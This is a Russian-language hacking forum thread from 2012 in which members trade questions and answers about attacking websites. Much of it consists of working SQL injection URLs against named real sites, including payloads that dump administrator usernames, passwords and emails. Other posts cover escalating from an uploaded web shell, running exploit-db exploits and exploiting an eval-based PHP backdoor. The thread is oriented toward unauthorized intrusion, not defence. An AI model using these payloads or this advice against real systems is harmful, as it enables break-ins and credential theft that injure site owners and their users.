Ваши вопросы по уязвимостям.

Konqi · 16 Nov 2012

p1oneer said:

"passwd" – не вижу такой каталог, хотя в etc вообще нет папок. Это значит у меня не хватает прав?
Click to expand...

это значит что passwd Не каталог а файл, и тебе срочно надо курить книжку по linux. смекаешь?

intertrey said:

хм
http://0214.by/catalog.php?id=130 AnD 1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 0 ЛОЖЬ

а у строковых также?
http://0214.by/catalog.php?id=130' AnD '1 ИСТИНА
http://0214.by/catalog.php?id=130' AnD '0 ЛОЖЬ

Это как аналоги сравнения для:
http://0214.by/catalog.php?id=130' AnD 'hexon'='hexon ИСТИНА
http://0214.by/catalog.php?id=130' AnD 'hexon'>'hexjector ЛОЖЬ

Равнозначны или не?)
Click to expand...

http://0214.by/catalog.php?id=130+and+0+union+select+1,version(),3,4,5,6,7,8,9,10--+

внимательнее. смотри в тайтл

Konqi · 16 Nov 2012

intertrey said:

Эм. Я чуток о другом спросил, сайт просто для примера привел, мне не интересны ни колонки ни title

Вот это http://0214.by/catalog.php?id=130' AnD '1 и вот это http://0214.by/catalog.php?id=130' AnD 'hexon'='hexon одно и тоже по сути? Просто для себя скрипт пишу, вырабатываю оптимальный алгоритм под свои нужны. У меня на некоторых сайтах фильтруется и '=' и операторы сравнения '>'. Просто если Я хочу интежер сравнивать между собой, то могу указать вот так вот просто:
http://0214.by/catalog.php?id=130 AnD 1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 0 ЛОЖЬ
а не:
http://0214.by/catalog.php?id=130 AnD 1=1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 1>2 ЛОЖЬ

Также можно сделать для string? Справка от mysql http://www.mysql.ru/docs/man/Comparison_Operators.html не дала мне точного ответа)
Click to expand...

and 1
and 0

такая конструкция работает не во всех СУБД

лучше and 1=1 / and 1=0

для string (MySQL)

SELECT * FROM `products` WHERE 'antichat' (empty set)
SELECT * FROM `products` WHERE 'antichat'='antichat' (true)

avegolove · 16 Nov 2012

Дело в том что я залил шелл в раздел banners, но не могу перейти ни в какой раздел кроме этого, так-как ограничены права. Я слышал что можно залить файл htaccess прописав что-то и другие папки будут иметь полные права. Так ли это или есть другие способы открыть полные права на другие разделы?

vaddd · 16 Nov 2012

http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%280x3c696e6a5f646174613e,table_name,0x3c2f696e6a5f646174613e%29,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.tables%20limit%2029,1

http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%28user,0x3a,pass,0x3a,email%29,4,5,6,7,8,9,10,11,12,13%20from%20zp_administrators%20limit%200,1

WTF?

Konqi · 17 Nov 2012

avegolove said:

Дело в том что я залил шелл в раздел banners, но не могу перейти ни в какой раздел кроме этого, так-как ограничены права. Я слышал что можно залить файл htaccess прописав что-то и другие папки будут иметь полные права. Так ли это или есть другие способы открыть полные права на другие разделы?
Click to expand...

ограниченные права на сервере? так как ты хочешь поднять права посредством .htaccces? тебе рутать надо а не htaccess заливать

vaddd said:

http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%280x3c696e6a5f646174613e,table_name,0x3c2f696e6a5f646174613e%29,4,5,6,7,8,9,10,11,12,13%20from%20information_schema.tables%20limit%2029,1

http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%28user,0x3a,pass,0x3a,email%29,4,5,6,7,8,9,10,11,12,13%20from%20zp_administrators%20limit%200,1

WTF?
Click to expand...

читаем статью нолика. несколько раз.

avegolove · 17 Nov 2012

Ограниченные а как можно поднять права?

qaz · 17 Nov 2012

avegolove said:

Ограниченные а как можно поднять права?
Click to expand...

тебе ж сказали, рутать

seozone · 17 Nov 2012

непойму, как юзать сплойты с http://www.exploit-db.com

Prosta4ok · 17 Nov 2012

seozone said:

непойму, как юзать сплойты с http://www.exploit-db.com
Click to expand...

конкретизируй свой вопрос.. там много разных сплоитов, на разных языках

tester_new · 17 Nov 2012

seozone said:

непойму, как юзать сплойты с http://www.exploit-db.com
Click to expand...

Python:
./exploit.py -some key
C/C++
gcc –o exploit exploit.c #это очень грубый пример
читай про gcc компилятор

seozone · 18 Nov 2012

Prosta4ok said:

конкретизируй свой вопрос.. там много разных сплоитов, на разных языках
Click to expand...

например, http://www.exploit-db.com/exploits/22766/

Prosta4ok · 18 Nov 2012

seozone said:

например, http://www.exploit-db.com/exploits/22766/
Click to expand...

там просто SQLi через GET запрос и перечислены уязвимые переменные

seozone · 18 Nov 2012

Prosta4ok said:

там просто SQLi через GET запрос и перечислены уязвимые переменные
Click to expand...

покажи пример в пм)

vaddd · 18 Nov 2012

Konqi said:

ограниченные права на сервере? так как ты хочешь поднять права посредством .htaccces? тебе рутать надо а не htaccess заливать

читаем статью нолика. несколько раз.
Click to expand...

можно линк? не могу найти...

justonline · 18 Nov 2012

Есть форма добавления объявления. Вставляю кавычку в пост запрос и получаю.

item id
user_id
sale or buy
stone1
stone1_val
stone2
stone2_val
city_all
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0', '25', '0', '25', '123', '0')' at line 16
Click to expand...

если делаю так '+order+by+2+--+ пишет -

item id
user_id
sale or buy
stone1
stone1_val
stone2
stone2_val
city_all
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+2+--+', '0', '25', '0', '25', '123', '0')' at line 16
Click to expand...

Пробовал без кавычки определить кол-во полей, но Проблема в том, что после пост запроса подгружается другая страница, которая возникает при правильном запросе.
Что попробовать, как быть?

p.s. Корыстных целей не преследую, ресурс закрытый и направленности совсем не интересная широкой публике. Бага будет сдана сразу админу.

VY_CMa · 18 Nov 2012

justonline, inj в insert, свои методы.
https://forum.antichat.ru/thread35207.html

justonline · 18 Nov 2012

VY_CMa said:

justonline, inj в insert, свои методы.
https://forum.antichat.ru/thread35207.html
Click to expand...

точно) что-то мой пияный моск не сообразил, что тут запись а не select)

Prosta4ok · 18 Nov 2012

seozone said:

покажи пример в пм)
Click to expand...

так там все расписано, какой еще пример?

ищешь сайт с уязыимым скрптом, подставляешь
Code:
сайт/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--
если показывает версию БД знач все пучком и можно крутить скулю дальше

justonline · 18 Nov 2012

VY_CMa said:

justonline, inj в insert, свои методы.
https://forum.antichat.ru/thread35207.html
Click to expand...

Select * from dle_users where user_id = 292+order+by+1+--+2 Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--+' at line 1
Click to expand...

из той же оперы? опять пост, но вот смущает Select, правда почему, интересно он выводится в ошибке...

Alert · 18 Nov 2012

Вопрос, как эксплуатировать бекдор eval ($_REQUEST['a']); ?

Попробовал на локалхосте выполнить http://localhost/test.php?a=http://test1/wso2_pack.php

выдает ошибку

Parse error: syntax error, unexpected ':' in .....\localhost\test.php(15) : eval()'d code on line 1
Click to expand...

соответственно бекдор прописан на 15 строчке

Ваши вопросы по уязвимостям.

Konqi Green member

Konqi Green member

avegolove Banned

vaddd Member

Konqi Green member

avegolove Banned

qaz Elder - Старейшина

seozone Member

Prosta4ok New Member

tester_new Elder - Старейшина

seozone Member

Prosta4ok New Member

seozone Member

vaddd Member

justonline network ninja

VY_CMa Green member

justonline network ninja

Prosta4ok New Member

justonline network ninja

Alert New Member

Useful Searches

Ваши вопросы по уязвимостям.

Konqi Green member

Konqi Green member

avegolove Banned

vaddd Member

Konqi Green member

avegolove Banned

qaz Elder - Старейшина

seozone Member

Prosta4ok New Member

tester_new Elder - Старейшина

seozone Member

Prosta4ok New Member

seozone Member

vaddd Member

justonline network ninja

VY_CMa Green member

justonline network ninja

Prosta4ok New Member

justonline network ninja

Alert New Member